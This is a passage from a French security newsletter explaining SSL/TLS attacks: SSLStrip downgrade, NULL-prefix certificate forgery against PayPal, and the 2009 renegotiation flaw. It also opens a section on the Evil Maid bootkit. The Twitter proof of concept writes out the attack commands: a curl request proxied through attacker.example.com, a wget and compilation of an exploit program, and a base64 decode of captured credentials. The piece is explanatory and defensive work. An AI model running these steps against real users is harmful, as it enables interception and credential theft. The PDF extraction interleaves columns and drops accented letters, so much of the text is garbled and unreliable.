SSL c'est quoi ? Petite piqre de rappel... lapplication utilisant SSL/TLS, par exemple HTTP,
fonctionne de la mme manire que si elle tait place
Secure Socket Layer , ou SSL pour les intimes, directement au dessus de TCP.
est un protocole dfini la base par la socit De nos jours, on retrouve ce protocole un peu partout. Il
Netscape (oui oui, celle des navigateurs ponymes ! ). est notamment associ HTTP pour former le HTTPS
SSL avait t mis en place afin de scuriser les utilis par tous les sites web qui traite des informations
changes de donnes sur internet. En effet, par dfaut, sensibles...
les donnes transitant par les protocoles HTTP, FTP, et
autres, sont toutes transmises en claires sur le rseau. La plupart des gens parlent de SSL pour dsigner
Autrement dit, nimporte qui parvenant se placer entre indiffremment SSL ou TLS. Nous allons galement
vous et votre serveur de mail peut lire vos messages. utiliser cet abus de langage dans la suite du dossier.

Et quel est le lien avec TLS me direz-vous? TLS ,


pour Transport Layer Security , est tout
simplement la normalisation du protocole SSL (version
WWW.XMCOPARTNERS.COM
3) par lIETF - RFC 2246. Nanmoins, quelques
diffrences existent tout de mme entre SSL et TLS
rendant ces derniers non interoprables.

SSL/TLS fonctionne suivant un mode client-serveur, et


permet datteindre les objectifs de scurit CIA :
Confidentialit des donnes changes (chiffrement)
Intgrit des donnes changes (hachage)
Authenticit du serveur (certificat X.509)

SSL/TLS se place au dessus de TCP, et est transparent


pour le protocole de niveau suprieur. Cest--dire que

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [17]
SSL EST-IL DEPASSE ? LACTU SCU N24

SSL dans la presse... SSLStrip ou une attaque astucieuse


SSL est donc un standard reconnu et particulirement Le principe de l'attaque
utilis sur internet. Il est donc vident que de
nombreuses recherches soient menes sur la scurit Les premires recherches innovantes ont t menes
de ce protocole, scurit que l'on croyait prouve... par Moxie Marlinspikes. Le chercheur s'est fait
connatre en prsentant travers le monde un outil
Suite aux dboires du protocole DNS et de BGP, ce ft capable de raliser des attaques Man In The Middle
donc au tour du protocole SSL d'tre touch par SSL...
plusieurs vulnrabilits dvoiles ces derniers mois.
Une attaque "Man In The Middle" discrte sur le

Une
protocole SSL ne pouvait tre mene jusqu' prsent
attaque "Man In The Middle" puisque le pirate devait casser la chane
dauthentification SSL afin de s'introduire au sein d'une
discrte sur le protocole SSL ne pouvait communication.
tre mene jusqu' prsent puisque le
pirate devait casser la chane Ainsi, le pirate ne pouvait que proposer des certificats
autosigns et donc veiller les soupons des victimes
dauthentification SSL afin de s'introduire les plus attentives.
au sein d'une communication...

Nous tenterons dans cet article de faire le point sur


ces diffrents problmes...

Moxie Marlinspike s'est justement fait connatre ds


2002 avec la publication d'un outil baptis SSLSnif
capable de raliser une telle attaque en quelques lignes
de commandes...

Quelques annes plus tard, revoil Moxie avec un outil


trs simple, mais particulirement efficace...

Le but : raliser une attaque "Man In The Middle" afin


de capturer tout le trafic ralis entre une victime et un
site web implmentant une partie HTTP et une partie
HTTPS (ce qui est le cas pour la plupart des sites web
utilisant le protocole HTTPS).

Le pirate se place entre la victime et le serveur et utilise


SSLStrip afin de remplacer la vole tous les liens
contenant la chane HTTPS renvoye par le serveur par
WWW.XMCOPARTNERS.COM

la chane HTTP.

Cette opration force le navigateur de la victime


communiquer avec le pirate uniquement via le protocole
HTTP. Le pirate communique ensuite avec le serveur
via le protocole HTTPS.

L'ide parat trs simple, mais personne n'avait


jusqu'alors pens dvelopper un tel outil.

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [18]
SSL EST-IL DEPASSE ? LACTU SCU N24

Exemple concret sur GMAIL L'outil de Moxie intervient dans cette dernire tape. En
effet, comme le pirate qui mne l'attaque intercepte
Prenons un exemple simple. Pour accder GMAIL. La toutes les requtes mises par la victime, mais
plupart des gens vont taper gmail.com". Une premire galement toutes les rponses renvoyes par le
requte GET est envoye au serveur de Google. serveur, l'outil peut donc modifier, la vole, certaines
donnes.

Le pirate se place entre la victime et le


serveur et utilise SSLStrip afin de remplacer
la vole tous les liens contenant la chane
HTTPS renvoye par le serveur par la
chane HTTP...
Le serveur rpond alors par un code 301 qui indique au
navigateur de suivre l'adresse http://mail.google.com. En l'occurrence, SSLStrip remplace le dernier lien de la
sorte :

HTTP/1.1 302 Moved Temporarily


Set-Cookie: GMAIL_RTT=EXPIRED; Expires=Mon,
14-Dec-2009 14:12:50 GMT; Path=/mail
Set-Cookie: GMAIL_RTT=EXPIRED; Expires=Mon,
....
Location: https://www.google.com/accounts/...

Le navigateur visite donc http://mail.google.com.


HTTP/1.1 302 Moved Temporarily
Set-Cookie: GMAIL_RTT=EXPIRED; Expires=Mon,
14-Dec-2009 14:12:50 GMT; Path=/mail
Set-Cookie: GMAIL_RTT=EXPIRED; Expires=Mon,
....
Location: http://www.google.com/accounts/...

Avez-vous remarqu la manipulation ? Effectivement, le


champ Location bas sur le protocole HTTPS repose
maintenant sur le protocole HTTP...
Enfin, le serveur redirige encore l'internaute vers la
Le pirate peut donc rcuprer les identifiants de
WWW.XMCOPARTNERS.COM
page d'authentification
connexion envoys en clair par la victime puis
communiquer de son ct en HTTPS avec les
identifiants rcuprs...

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [19]
SSL EST-IL DEPASSE ? LACTU SCU N24

Common Name, Wildcard : les recherches de


kaminsky et Marlinspike

Strcmp (paypal.com, paypal.com\0.hack.us)

La premire vulnrabilit dont nous allons parler


concerne plus particulirement les certificats X.509
utiliss par le client afin dauthentifier le serveur et de
sassurer de son identit.

Marlinspikes et Kaminsky ont montr que


l'utilisation de caractres spciaux au sein
d'un certificat X.509 et plus
particulirement au sein du champ CN
(Common Name) pouvait avoir un
Mire de login lors d'une connexion saine entre un comportement tonnant lors du traitement
internaute et le service Gmail
de ces certificats par la plupart des
navigateurs.

Cette vulnrabilit a t dvoile par Moxie


Marlinspikes et Dan Kaminsky, fin juillet 2009, lors de
la Black Hat Las Vegas. Ces deux chercheurs ont
montr que l'utilisation de caractres spciaux au sein
d'un certificat X.509 et plus particulirement au sein du
champ CN (Common Name) pouvait avoir un
comportement tonnant lors du traitement de ces
certificats par la plupart des navigateurs...

La dlivrance dun certificat X.509 se passe en


plusieurs tapes:
1. Un site souhaitant dployer du SSL doit gnrer
une paire de clefs cryptographiques. Une de ces
clefs est garde prive, tandis que la seconde est
publique.
Lors d'une attaque avec l'outil SSLStrip tous les liens
sont alors convertis en HTTP 2. Le site gnre ensuite une demande de signature
WWW.XMCOPARTNERS.COM

de certificat, Certificate Signing Request ou CSR


La victime surfe donc sur le site via le protocole HTTP , qui va contenir la clef publique ainsi que des
(donnes en clair). informations complmentaires sur lidentit dudit site.
Parmi ces informations se trouve le champ Common
Certains sites, comme facebook, utilisent uniquement le Name ou CN . Ce dernier se retrouvera aussi dans
protocole HTTPS pour envoyer le login et le mot de le certificat final, et est utilis par un client afin
passe lors de l'authentification. Or, moins de vrifier didentifier le serveur sur lequel il se connecte. Pour un
que le formulaire ne poste pas vers un site utilisant le navigateur web, ce champ doit tre identique au nom
protocole HTTPS, l'attaque est difficilement dtectable de domaine de lURL tape dans la barre dadresse.
et a de grandes chances de russir notamment sur les Par exemple, le champ CN du certificat appartenant
hotspots... Paypal doit contenir www.paypal.com.
Passons prsent aux vulnrabilits du protocole
3. Le CSR est ensuite envoy un tiers de confiance
SSL...
appel Autorit de Certification, galement connu

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [20]
SSL EST-IL DEPASSE ? LACTU SCU N24

sous le sigle CA pour Certificate Authority. Le CA Une personne malveillante pouvait alors demander un
va alors vrifier que lmetteur de la demande est bien certificat pour un domaine tel que :
le propritaire du domaine correspondant au CN. Cela
est simplement fait en cherchant les coordonnes du www.paypal.com\0.hacker.com
responsable dans la base WHOIS, puis en lui envoyant
un email de confirmation. Ce qui est important de noter Le CA ne prenant en compte que le domaine root,
ici est que linformation relative lidentit dun site hacker.com, si la personne est bien le propritaire de ce
nest associe quavec le domaine root, la plupart des domaine, le certificat sera dlivr sans problme.
CA ignorant compltement le contenu des sous-
domaines qui pourraient tre prsent. En clair, Verisign
nen a rien faire que vous soumettiez une demande Une comparaison entre les chanes de
de certificat pour www.paypal.com, toto.paypal.com, ou caractres du langage C www.paypal.com
jesuisunpirate.paypal.com du moment que vous tes en et www.paypal.com\0.hacker.com conclura
mesure de prouvez que vous dtenez le domaine root
paypal.com. que les deux chanes sont identiques...

Le problme surgit lorsque lon sait que la plupart des


4. Enfin lorsque tout est conforme, le CA renvoie le
implmentations de SSL, et notamment la CryptoAPI
certificat sign au demandeur.
de Microsoft utilise par de nombreuses applications,
Une autre chose importante savoir est que les ne traitent pas les champs des certificats X.509 en tant
certificats X.509 utilisent la notation ASN.1. Celle-ci que chane de caractres Pascal, mais en tant que
supporte plusieurs types de chanes de caractres, chane de caractres C...
mais ces dernires sont toutes des variations des
Le lecteur averti aura compris lerreur et la vulnrabilit
chanes de caractres Pascal (provenant du langage
que cela implique. Une comparaison entre les chanes
de programmation du mme nom). En mmoire, les
de caractres du langage C www.paypal.com et
chanes de caractres Pascal sont reprsentes par
www.paypal.com\0.hacker.com conclura que les deux
une srie doctets : le 1er octet correspond la
chanes de caractres sont identiques. Le dtenteur du
longueur de la chane, suivie par la chane de
certificat contrefait peut ainsi le prsenter pour les
caractres elle-mme, un caractre par octet :
connexions www.paypal.com qui considreront ledit
certificat comme valide. La proprit dauthenticit de
OCTET 0 OCTET 1 ... OCTET N SSL serait donc contourne, ce qui permettrait, entre
autres choses, de conduire des attaques de type Man-
0xN 0x41 0x... 0x5A in-the-Middle.
longueur A Z

Cette reprsentation est diffrente de celle des


chanes de caractres C qui sont reprsentes en
mmoire par la chane de caractres elle-mme (un
caractre par octet) suivie par loctet reprsentant le
caractre NULL signifiant la fin de la chane : WWW.XMCOPARTNERS.COM

OCTET 1 ... OCTET N OCTET N+1

0x41 0x... 0x5A 0x00


A Z NULL

Une consquence rsultant de ces diffrences est que


le caractre NULL est trait comme nimporte quel
autre caractre dans une chane Pascal.

La vulnrabilit expose par les chercheurs en scurit


reposait sur cette proprit. Il est possible dinclure le
caractre NULL dans n'importe quels champs dun
certificat X.509 et plus particulirement dans le champ
CN...
Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est
strictement interdite. [21]
SSL EST-IL DEPASSE ? LACTU SCU N24

Wildcard : une vulnrabilit peut en cacher une Bien heureusement pour les utilisateurs du renard roux,
autre... plus communment connu sous le nom de Firefox, les
vulnrabilits avaient t corriges dans les jours
La seconde vulnrabilit dcoule en quelque sorte de la suivant la confrence de Moxie Marlinspikes. Plus
premire, et implique lutilisation de Wildcards (*). gnralement les produits Mozilla avaient tous
rapidement reu leur correctif.
Si au lieu de demander un certificat pour
www.paypal.com\0.hacker.com, quelquun demandait Malheureusement pour les pro-windows nutilisant pas
un certificat pour *\0.hacker.com, il obtenait un certificat Firefox, au moment de la publication de ces certificats,
valide pour nimporte quel domaine vis--vis de certains navigateurs restaient toujours vulnrables.
certaines implmentations de SSL. Firefox, Thunderbid
et la messagerie instantane Pidgin taient notamment
vulnrables cette attaque.

Des faux certificats dans la nature...

Quelques semaines aprs la Black Hat, deux


certificats exploitant les failles de scurit dcrites
plus haut taient lchs dans la nature (ou plutt sur
certaines listes de diffusion orientes scurit).

Le premier certificat a t publi le 29 septembre 2009,


par Jacob Appelbaum. Celui-ci exploitait la
vulnrabilit wildcard ne touchant quune partie
restreinte dapplications :

CN=*\x00thoughtcrime.noisebridge.net

Le second certificat a t publi par Tim Jones le 5


octobre 2009, et fit beaucoup plus parler de lui, puisquil Nous avions notamment pu vrifier dans nos
visait directement le site de Paypal en utilisant la laboratoires que les navigateurs Internet Explorer,
vulnrabilit NULL Prefix : Google Chrome et Safari taient toujours vulnrables
lattaque par NULL Prefix , le champ CN
apparaissant comme www.paypal.com et non comme
CN= www.paypal.com\0ssl.secureconnection.cc w w w. p a y p a l . c o m \ 0 s s l . s e c u r e c o n n e c t i o n . c c .
Nanmoins, Internet Explorer et Safari alertaient
lutilisateur que le certificat avait t rvoqu par
lautorit de certification. Mais cette rvocation aurait
trs bien pu tre dtourne en attaquant lOCSP,
Online Certificate Status Protocol servant justement
vrifier la validit des certificats, avec la technique
WWW.XMCOPARTNERS.COM

galement publie par Moxie Marlinspikes.

En fin de compte, seuls Firefox et Opera prenaient en


compte de manire correcte le champ CN. Aucun des
navigateurs mis jour ntait vulnrable lattaque par
Wildcard .

Il aura fallu attendre prs de 13 semaines pour que


Microsoft corrige la CryptoAPI, lors de son Patch
Tuesday doctobre 2009 avec le bulletin MS09-056.

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [22]
SSL EST-IL DEPASSE ? LACTU SCU N24

Le danger vient de lintrieur 3. Le client vrifie la validit du certificat. Si celui-ci


est valide, le client gnre des clefs partir desquelles
Dernirement une nouvelle faille de scurit vient d'tre seront drives les clefs de chiffrement. Les clefs
dcouverte. Celle-ci vient de la conception mme de gnres sont envoyes au serveur de manire chiffre
SSL, et affecte donc potentiellement tous les protocoles grce la clef publique de ce dernier.
utilisant ce dernier. La vulnrabilit en question a t 4. Enfin, chaque partie envoie lautre un message
publie le 4 novembre par Marsh Ray et Steve Change Cipher Spec afin dactiver le chiffrement,
Dispensa. Avant de se plonger plus en dtail dans le ainsi quun message Finished pour signaler la fin de
sujet, quelques rappels (et oui encore!) sur le la ngociation.
fonctionnement de SSL simposent.
5. Les donnes transmises par la suite, y compris les
messages de contrle) sont chiffres laide des clefs
Handshake SSL gnres par le client.
Lorsquun client souhaite se connecter un serveur en noter que le protocole permet galement
utilisant le protocole SSL, celui-ci doit initier une phase dauthentifier le client laide dun certificat X.509.
de ngociation. Cette phase permet aux deux parties
de saccorder sur les paramtres utiliser lors de la Le protocole autorise nimporte quelle partie engager
connexion scurise. La ngociation se droule de la une rengociation de la session tout moment. La
faon suivante: raison principale cette possibilit est de permettre
1. Le client envoie au serveur un message lui signifiant celui qui le dsire de rafrachir les clefs de chiffrement
quil dsire tablir une connexion chiffre. Ce Client ou autres. Pour cela, le client na qu envoyer un
Hello contient entre autres la liste des suites de message Client Hello dans le canal chiffr et tout se
chiffrement supportes. droule comme dans une phase de ngociation
normale. Par contre, si cest le serveur qui souhaite
2. Le serveur rpond au client avec un Server Hello initier une rengociation, celui-ci doit envoyer un
. Ce dernier contient la version de SSL retenue, ainsi message Hello Request , le client rpond alors par
que les suites de chiffrement choisies dans la liste un Client Hello , et la suite se droulant comme
reue. Le serveur envoie galement son certificat au expliqu prcdemment.
client, et termine par un Server Hello Done .
De plus, de chaque ngociation
SSL russie rsulte une session
SSL laquelle correspond une
Session ID . SSL permet la
reprise de session, dans
laquelle le client spcifie une
Session ID correspondante
une session antrieure. Ceci
permet de gagner du temps
CPU en vitant le cot dune
initialisation cryptographique
complte.

Revenons prsent sur la


WWW.XMCOPARTNERS.COM

vulnrabilit. Les chercheurs ont


constat que SSL nassurait pas
de continuit lors dune phase
de rengociation de paramtres,
permettant alors une attaque de
type Man-in-the-Middle. Un
attaquant est ainsi en mesure
dinjecter des donnes au dbut
du flux du protocole utilisant
SSL. Pas trs clair? Nous allons
arranger a.

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [23]
SSL EST-IL DEPASSE ? LACTU SCU N24

L'attaque de rengociation ltape 2. Lattaquant ne sert ensuite que de pont


entre le client et le serveur, retransmettant les
Le principe de lattaque reste le mme quelque soit le messages dans les 2 sens.
protocole utilisant SSL. Les schmas suivants ont t
repris du PDF de Thierry Zoller (http://www.g-sec.lu/ 5. Le client reoit alors un message Server Hello
practicaltls.pdf). Concentrons-nous sur un cas simple : quil pense correspondre son message initial, alors
HTTP au dessus de SSL, soit HTTPS, le tout sans quil sagit en fait de la rponse la rengociation initie
authentification du client par certificat. Prenons comme par lattaquant avec le message intercept.
exemple une banque qui authentifierait ses clients 6. partir de l, le client et le serveur tablissent une
laide de cookie de session : connexion chiffre, les donnes changes ne peuvent
0. Lattaquant se place entre le client et le serveur (via plus tre lues par lattaquant. Le client envoie une
une attaque ARP-poisoning ou autre). requte HTTP pour accder la page dsire du site
bancaire:
1. Le client souhaite tablir une connexion chiffre avec
le serveur. Son message Client Hello est intercept GET /monCompte/ HTTP 1.1
par lattaquant qui le met de ct. ...
Cookie: user=moi;pass=secret
2. Lattaquant tablit une connexion chiffre avec le
serveur.
7. Le serveur, recevant cette requte, pense quil sagit
de la suite de la requte laisse en suspend par
lattaquant ltape 4. Il la concatne alors cette
GET /monCompte/virement.php?pour=h4ck3r HTTP 1.1
X-en-tete-bidon: dernire. Au final, la requte interprte par le serveur
est donc la suivante:

GET /monCompte/virement.php?pour=h4ck3r HTTP


3. Lattaquant envoie une requte HTTP au serveur, 1.1
mais ne termine pas sa requte (pas de CRLF CRLF). X-en-tete-bidon: GET /monCompte/ HTTP 1.1
...
4. Lattaquant initie alors une rengociation, en Cookie: user=moi;pass=secret
envoyant au serveur le Client Hello intercept

Lattaquant a ainsi pu
effectuer une action avec
les droits de lutilisateur
ls. Il est vrai que dans
lexemple prsent ci-
dessus une attaque par
CSRF aurait suffi,
cependant cet exemple
sert juste dillustration.

la vue de toutes les


conditions ncessaires
WWW.XMCOPARTNERS.COM

la ralisation de cette
attaque, de nombreux
experts en scurit taient
sceptiques face
lexploitation de cette
vulnrabilit dans le
monde rel.

Un jeune diplm de
lInstitut Eurecom a au
contraire trouv un moyen
original dexploiter cette
vulnrabilit.

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [24]
SSL EST-IL DEPASSE ? LACTU SCU N24

L'exem ple Twitt er : h4c k3r@twitt er

Anil Kurmu a profit de cette faille de scurit afin de


Victime :
voler les identifiants et mots de passe dun compte
Twitter. Il a en fait lgrement modifi lastuce $ curl -u "victim@example.com:securepw" -d
prsente par Marsh Ray, et explique ci-dessus, afin "status=any" https://twitter.com/statuses/
dexploiter cette vulnrabilit via une requte HTTP update.xml -p -x attacker.example.com:8080 \
POST : # proxying the request through
attacker.example.com, to simulate a MITM

POST /forum/envoyer.php HTTP/1.0

message=GET / HTTP/1.1 [...]


Voici le rsultat obtenu lors de son test :

Dans cette illustration, la requte HTTP GET de la


victime est entirement contenue dans le corps de la
requte POST de lattaquant, en tant que valeur du
paramtre message . Lattaquant a ainsi accs aux
en-ttes HTTP, dont les cookies, ou encore len-tte
Authorization servant un client qui souhaite
sauthentifier auprs du serveur sans attendre de
rponse HTTP 401. Cet en-tte Authorization contient
ainsi les informations ncessaires un client pour
sauthentifier, autrement dit son login et son mot de
passe. Lattaquant a ainsi utilis la mise jour du statut de
son propre compte Twitter pour rcuprer le dbut de
Anil Kurmu a ainsi test sa thorie sur le site Twitter la requte de la victime. Il ne reste plus qu dcoder
en utilisant leur API RESTful. Il est par exemple les informations :
possible de mettre jour son status Twitter en utilisant
$ echo -n dmljdGltQGV4YW1wbGUuY29tOnNlY3VyZXB3 |
lutilitaire curl : base64 -d
victim@example.com:securepw
$ curl -u "login:motdepasse" -d "status=Nouveau
status" https://twitter.com/statuses/update.xml
Il est inutile de tenter de reproduire cette attaque la
En utilisant la technique explique plus haut, un maison, lquipe de Twitter ayant dj colmat la
attaquant peut ainsi accder aux 140 premiers brche !
caractres de la requte envoye par une
victime (Twitter limitant les messages 140
caractres). Ci-dessous les commandes
effectues par Anil Kurmu pour effectuer sa
preuve de concept :

Attaquant :

attacker.example.com$ wget http://


perso.telecom-paristech.fr/~kurmus/
ssl.c #based on the PoC published on
full disclosure

attacker.example.com$ gcc -lssl ssl.c


-o ssl

attacker.example.com$ ./ssl 8080 `echo


-n "attacker@example.com:evilpw" |
base64`
X-en-tete-bidon:

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [25]
SSL EST-IL DEPASSE ? LACTU SCU N24

La mort des transactions scurises sur internet ?


GET /monCompte/pageRedirect.html HTTP/1.1
X-en-tete-bidon:
Aprs Anil Kurmu, Franck Heidt de Leviathan Security
Group aurait galement trouv une exploitation
originale de la faille prsente par Marsh Ray et Steve Comme dans lattaque initiale, la requte nest pas
Dispensa. Sa preuve de concept gnrique serait termine (pas de CRLF CRLF). Lattaquant initie alors une
utilisable pour attaquer un grand nombre de sites rengociation, en envoyant au serveur le Client Hello
diffrents. Franck Heidt na pas dvoil son code intercept ltape 2.
source, vu le nombre de sites qui seraient actuellement
vulnrables. Cependant, celui-ci explique tout de mme 5. Le client reoit un message Server Hello quil
le principe de lattaque. Le pirate doit envoyer des pense correspondre son message initial, alors quil
donnes au serveur SSL provoquant en rponse un sagit en fait de la rponse la rengociation initie par
message de redirection. Le pirate va ensuite profiter de lattaquant avec le message intercept. Une fois la
ce message de redirection pour envoyer la victime vers phase de ngociation termine, le navigateur de la
une connexion non scurise, o les pages pourront victime essaie daccder la page voulue. ex :
tre rcrites la vole avant dtre renvoyes au
navigateur de la victime. GET /monCompte/ HTTP/1.1
...
Cookie: xxxxxx
Lattaque dont il est ici question a galement t
dcouverte par des chercheurs de chez G-Sec.
Contrairement Franck Heidt, ces derniers ont publi 6. Le serveur, recevant cette requte, pense quil sagit
une preuve de concept, ainsi que des explications de la suite de la requte laisse en suspend par
beaucoup plus dtailles : lattaquant ltape 4. Il la concatne alors cette
1-3. Idem attaque classique dernire. Le serveur rpond donc au client par un
HTTP Redirect, le navigateur est alors redirig vers la
4. Lattaquant envoie une requte HTTP au serveur afin page daccueil qui nest pas en HTTPS mais en HTTP
de provoquer une rponse de redirection vers une page simple.
non chiffre (en gnral un HTTP 302). ex :
7. Lattaquant peut ensuite conduire une attaque
classique avec SSLstrip, et ainsi observer tous les
changes en clair entre le client et le serveur.

WWW.XMCOPARTNERS.COM

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [26]
SSL EST-IL DEPASSE ? LACTU SCU N24

O en est-on actuellement ? La plupart des applications web importantes


implmentent des protections contre les attaques de
Cette vulnrabilit affectant le design mme du CSRF. On peut par exemple citer les nombres
protocole SSL avait en ralit t dcouverte il y a de alatoires gnrs dans les formulaires web qui doivent
nombreux mois de cela. Au dbut, seul un groupe tre renvoys avec la requte dsire. Ces mesures de
restreint dindividus avait t mis au courant de la protection sont efficaces contre lattaque initiale
vulnrabilit, et travaillait depuis lors sur un correctif prsente par Marsh Ray et Steve Dispensa, celle-ci ne
appropri. Tout sest acclr lorsque lerreur de consistant qu faire excuter une requte avec les
conception a t dvoile par inadvertance sur une liste droits de la victime.
de diffusion et est ainsi devenu publique.

lheure de la rdaction de cet article, de nombreux


correctifs temporaires ont t diffuss dans lurgence
par les diffrents diteurs. Tous ces correctifs
dsactivent en fait la possibilit de rengociation
normalement offerte par SSL. En effet, pas de
rengociation, pas de manque de continuit de
lauthentification, et donc pas de faille.

A lheure de la rdaction de cette article,


de nombreux correctifs temporaires ont t
diffuss dans lurgence par les diffrents
diteurs. Tous ces correctifs dsactivent en
fait la possibilit de re-ngociation
normalement offerte par SSL

En fin de compte, cest de lIETF que devrait venir la


solution dfinitive, ce dernier tant lorigine de la
plupart des standards dInternet. LIETF dispose dun
draft proposant une extension au protocole SSL qui
effectuerait la liaison entre la phase de rengociation et
la connexion SSL dans laquelle elle [la phase de Cependant, les applications risques existent. Toutes
rengociation] seffectue. Ceci permettrait ainsi au celles qui permettent aux utilisateurs de stocker ou de
serveur de diffrencier la phase de ngociation initiale transmettre des donnes sont potentiellement
dune phase de rengociation. vulnrables. En effet, en utilisant la technique imagine
par Anil Kurmu, il est possible de rcuprer de
nombreuses informations sensibles transitant dans les
en-ttes des requtes HTTP. Parmi ces applications
risques, les premires venant lesprit sont bien
videmment les webmails. Un pirate pourrait ainsi
WWW.XMCOPARTNERS.COM
senvoyer un mail contenant les cookies de sa victime.

De plus, comme le montre la dernire preuve de


concept, en combinant SSLstrip et la vulnrabilit de
rengociation, il est possible de compromettre
compltement nimporte quelle connexion SSL, pour
peu que lapplication dispose de pages redirigeant vers
du HTTP simple. Ceci tait impossible avec SSLstrip
seul lorsque lutilisateur tapait directement lURL en
https:// dans son navigateur.

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [27]
SSL EST-IL DEPASSE ? LACTU SCU N24

Nanmoins, comme nous lavons vu, toutes les


techniques prsentes ncessitent que lattaquant se

INFO
trouve dans le mme rseau local que sa victime. Vous
navez donc rien craindre de chez vous. Par contre, il
est ncessaire dobserver la plus grande vigilance
lorsque vous naviguez depuis un point daccs public. Tester votre serveur web!
(En somme rien de bien nouveau...)
Il existe une mthode manuelle pour tester
Esprons tout de mme que le correctif de lIETF soit
votre serveur web vis--vis de cette
adopt avant que dautres exploitations sur dautres vulnrabilit. Pour cela, il est possible
protocoles que le HTTPS ne soient dcouvertes. d'utiliser un client ssl (openssl) et
d'excuter la commande suivante :
Mise jour : dbut janvier, lIETF a approuv le
d o c u m e n t Tr a n s p o r t L a y e r S e c u r i t y ( T L S ) openssl s_client -connect <serveur>:443
Renegotiation Indication Extension.
Le serveur renvoie alors un certains
Webographie nombre d'informations. En tapant le verbe
HTTP HEAD suivi de la lettre R (pour
Renegociation), vous obtiendrez ou non une
http://www.h-online.com/open/news/item/SSL-trick- erreur qui indiquera si votre serveur est
certificate-published-812375.html vulnrable...

http://lists.grok.org.uk/pipermail/full-disclosure/2009- HEAD / HTTP/1.0


R
October/071042.html

http://www.h-online.com/security/news/item/Forged- Serveur non vulnrable :


PayPal-certificate-fools-IE-Chrome-and-
Safari-814303.html RENEGOTIATING
2201:error:1409E0E5:SSL
h t t p : / / w w w. t h e r e g i s t e r. c o . u k / 2 0 0 9 / 1 0 / 0 1 / routines:SSL3_WRITE_BYTES:ssl
microsoft_crypto_ssl_bug/ handshake failure:s3_pkt.c:530:

h t t p : / / w w w. t h e r e g i s t e r. c o . u k / 2 0 0 9 / 1 0 / 0 5 /
fraudulent_paypay_certificate_published/
Serveur vulnrable :
https://www.noisebridge.net/pipermail/noisebridge-
discuss/2009-September/008400.html
RENEGOTIATING
depth=1 /C=US/O=VeriSign, Inc./
http://www.g-sec.lu/practicaltls.pdf OU=VeriSign Trust Network/OU=Terms of
use at https://www.verisign.com/rpa
http://www.ietf.org/mail-archive/web/tls/current/ (c)05/CN=VeriSign Class 3 Secure
msg03928.html Server CA
verify error:num=20:unable to get
http://www.networkworld.com/news/2009/112009- local issuer certificate
security-pro-says-new-ssl.html verify return:0

http://blog.ivanristic.com/2009/11/ssl-and-tls- HTTP/1.1 302 Found


Server: Apache
authentication-gap-vulnerability-discovered.html
Location: https://www.xxx.fr
...
http://www.educatedguesswork.org/2009/11/
understanding_the_tls_renegoti.html

https://datatracker.ietf.org/drafts/draft-rescorla-tls- Un test automatique peut galement tre


renegotiation ralis depuis le site www.ssllabs.com
(voir page 45).
h t t p : / / w w w. s e c u r e g o o s e . o r g / 2 0 0 9 / 11 / t l s -
renegotiation-vulnerability-cve.html

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [28]
L'ACTU SCU N24

LACTUALITE DU MOIS
Lactualit du mois...

Que s'est-il pass au cours de ces


dernires semaines au sein du petit
monde de la scurit informatique ?

Plusieurs confrences intressantes


ont marqu cette fin d'anne : des
GSDAYS en passant par le salon
Milipol ou encore les C&ESAR
organiss par la DGA.

Ct vulnrabilit, Microsoft s'est


encore fait remarquer et les 0-days
pour Acrobat Reader continuent de
polluer la Toile.

Enfin, des attaques de Phishing


professionnelles ont t menes ce
qui a sans aucun doute permis
d'agrandir le botnet Zeus...

Adrien GUINAULT
Lin Miang JIN
Yannick HAMON
Franois LEGUE

XMCO | Partners

Ce mois-ci, nous avons choisi de diversifier cette rubrique en prsentant un rsum des confrences de ces
dernires semaines. Nous poursuivrons avec une explication de l'attaque "Evil Maid" qui a fait un buzz sur
Internet puis nous reviendrons sur les vulnrabilits les plus marquantes :

Evil Maid : explications de l'attaque sur le logiciel de chiffrement TrueCrypt.

Microsoft et les derniers correctifs : retour sur les vulnrabilit d'Octobre et Novembre

Adobe Acrobat Reader et un nouveau 0-day.

Les confrences Gsdays, Milipol et Cesar


WWW.XMCOPARTNERS.COM

Les attaques de Phishing en vogue

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est


strictement interdite. [29]
L'ACTU SCU N24

Evil Maid...

Une attaque l'encontre des logiciels de Stoned Bootkit


chiffrement
Revenons la confrence de Peter Kleissner,
En juillet dernier, le chercheur Peter Kleissner, ag prsentant son Stoned Bootkit.
seulement de 18 ans, prsentait la Black Hat USA Stoned est un petit programme qui remplace le Boot
2009 son Stoned Bootkit, un outil ddi la mise en Loader (programme chargeant le systme
place dun rootkit (malware interagissant avec le dexploitation) dans le BIOS par le sien.
systme dexploitation) qui permettait notamment de Grce cette manipulation, le programme du chercheur
contourner les scurits mises en place par le logiciel peut se lancer avant le systme dexploitation de
Truecrypt. lutilisateur et peut alors modifier (Hooker) les fonctions
du systmes sa guise.
Rappelons le, Truecrypt est un Un attaquant peut donc lancer des programmes avant
logiciel permettant aux utilisateurs de le dmarrage de Windows et ainsi sinterfacer entre les
nombreux systmes dexploitation priphriques de lordinateur et le systme
(Windows, Linux et Mac OS X) de dexploitation de lutilisateur.
crer un disque dur virtuel, au sein
duquel lensemble des donnes
places sera chiffr. Il est galement
possible de chiffrer entirement un
disque dur physique. Le chiffrement est effectu
automatiquement en temps rel et est totalement
transparent pour lutilisateur.

Ce disque dur chiffr peut alors tre mont lorsque


lutilisateur soumet le mot de passe destin chiffrer/
dchiffrer ses donnes avant le dmarrage de lOS si le
disque dur a t totalement chiffr, ou depuis une
fentre GUI depuis le systme dexploitation si
Lavantage de cette technique vient du fait que le
lutilisateur a choisi de crer un disque dur virtuel.
programme plac dans le MBR nest pas dtect par
les simples antivirus puisquaucun composant Windows
nest modifi en mmoire.

